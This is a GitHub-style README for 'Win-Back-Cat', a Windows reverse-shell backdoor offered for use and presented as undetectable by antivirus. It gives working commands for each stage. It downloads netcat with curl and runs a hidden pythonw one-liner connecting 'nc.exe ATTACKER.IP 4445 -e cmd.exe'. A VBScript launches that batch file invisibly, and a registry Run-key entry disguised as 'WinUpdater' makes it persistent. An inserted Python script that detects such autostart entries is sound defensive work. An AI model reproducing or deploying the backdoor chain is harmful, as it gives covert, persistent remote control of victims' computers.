Win-Back-Cat
A fully undetected, hidden, persistent, reverse netcat shell backdoor for Windows.
Prerequisites:
- You need to be logged in as an Administrator in order to be able to create a TCP listener with NetCat.
Python:
- Python should be preinstalled on the latest versions of Windows.
- You can check by running `python --version` in a command prompt.
- If Python is not installed, you will need to install it for this to work.
cURL:
- If you have version 1803 or later of Windows 10, cURL is installed by default.
- If you don't have cURL, you will need to install it for this to work.
- Otherwise, find an alternative way to fetch `nc.exe`.
Installation / How to use:
- Very simple: download and execute (on the victim's machine) the batch script `win-back-cat.bat`.
- Run a netcat listener on the attacker machine (ATTACKER.IP) to get a shell back. Example: `netcat -lvp 4445`
Breakdown (What's in the script):
- Move into the Temp folder with the environment variable `%TEMP%`, as this helps with compatibility between Windows versions.
- Fetch our Netcat version from the repo with:

```bat
curl https://raw.githubusercontent.com/RAF-87/win-back-cat/main/files/nc.exe > nc.exe
```
Why? - Reverse Shell
We need the Linux version of Netcat compiled for Windows, instead of the common OpenBSD version. The feature we need is this one:
- `-e filename`: specify filename to exec after connect (use with caution). Connects STDIN and STDOUT to the specified file.
In our case the filename will be `cmd.exe`. This flag is missing on some versions for obvious security reasons.
Pythonw - Undetected
- Why `pythonw.exe` instead of `python.exe`? `pythonw.exe` is a GUI app for launching GUI/no-UI-at-all scripts.
- NO console window is opened.
- Execution is asynchronous: when invoked from a console window, the script is merely launched and the prompt returns right away, whether the script is still running or not.
- Windows trusts python. 🤷

```bat
pythonw -c "from subprocess import check_output; check_output('nc.exe ATTACKER.IP 4445 -e cmd.exe', shell=True);" >> wncat.bat
```

We use `-c` to run the script as a one-liner from a string. We export it onto a batch script for easier execution chained with the next step.
Visual Basic - Hidden

```vbscript
Dim WinScriptHost
Set WinScriptHost = CreateObject("WScript.Shell")
WinScriptHost.Run Chr(34) & "%TEMP%\wncat.bat" & Chr(34), 0
Set WinScriptHost = Nothing
```

The above script will run our batch script as a separate process in the background without the user ever seeing anything. We need this to keep `pythonw.exe` alive in the background; otherwise, using just the batch script, we would need a command prompt window always open.
Windows Registry - Persistent

```bat
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /f /v WinUpdater /t REG_SZ /d "%TEMP%\wncat.vbs"
```

We add our Visual Basic script to the registry Run entry so that it runs when Windows boots up. So whenever we lose connection, the backdoor will reopen at the next reboot.
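The Run-key entry above is the most durable artifact this technique leaves behind, and it is also the easiest one to audit. The following is an added example written for this page (it is not part of the win-back-cat project) that parses the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and flags autostart values whose target is a script or lives in a temp directory, which is exactly the shape of the entry created here. The sample query output is constructed; the `WinUpdater` value name and `%TEMP%\wncat.vbs` path are taken from the README.

```python
import re

# Constructed sample of `reg query HKCU\...\Run` output (not captured from a real host).
SAMPLE_RUN_KEY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    WinUpdater    REG_SZ    %TEMP%\wncat.vbs
"""

# Locations and file types that are rarely legitimate autostart targets.
TEMP_MARKERS = ("%temp%", "%tmp%", "\\appdata\\local\\temp\\", "\\windows\\temp\\")
SCRIPT_EXTS = (".vbs", ".vbe", ".bat", ".cmd", ".js", ".jse", ".wsf", ".ps1")

# One value line of `reg query` output: name, type and data separated by runs of spaces.
_LINE_RE = re.compile(r"^\s+(.+?)\s{2,}(REG_[A-Z_]+)\s{2,}(.*?)\s*$")


def parse_run_entries(text):
    """Return (name, type, data) tuples for every value line in the query output."""
    return [m.groups() for m in map(_LINE_RE.match, text.splitlines()) if m]


def launch_target(data):
    """Extract the program or script path from the value data, honouring quoting."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end != -1 else data[1:]
    return data.split()[0] if data else ""


def suspicious_reasons(data):
    """Heuristics matching the pattern in this README: a script launched from %TEMP%."""
    target = launch_target(data).lower()
    reasons = []
    if any(marker in target for marker in TEMP_MARKERS):
        reasons.append("autostart target lives in a temp directory")
    if target.endswith(SCRIPT_EXTS):
        reasons.append("autostart target is a script rather than an executable")
    return reasons


def find_suspicious_run_entries(text):
    """Map each flagged value name to the list of reasons it was flagged."""
    flagged = {}
    for name, _type, data in parse_run_entries(text):
        reasons = suspicious_reasons(data)
        if reasons:
            flagged[name] = reasons
    return flagged


if __name__ == "__main__":
    for name, reasons in find_suspicious_run_entries(SAMPLE_RUN_KEY).items():
        print(f"{name}: {'; '.join(reasons)}")
```

On a live host, feed it the output of `reg query` for both the HKCU and HKLM Run keys; a value name that looks like a Windows component but points at a user-writable temp path is the signal to pull the referenced script and look for the `pythonw`/`nc.exe` chain described above.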
Tested on (Feel free to add to this list with a request):
- OS: Microsoft Windows 10 Pro 10.0.18363 N/A Build 18363
- Antivirus: Microsoft Defender, BitDefender
Note:
- Using these combined tools, Windows or any antivirus cannot detect this backdoor.
- Remember to edit ATTACKER.IP for the reverse shell to work.
Contact
- LinkedIn: https://www.linkedin.com/in/raffaele-paglietti/
- Email: wize@deadcyber.com
- Project Link: https://github.com/RAF-87/win-back-cat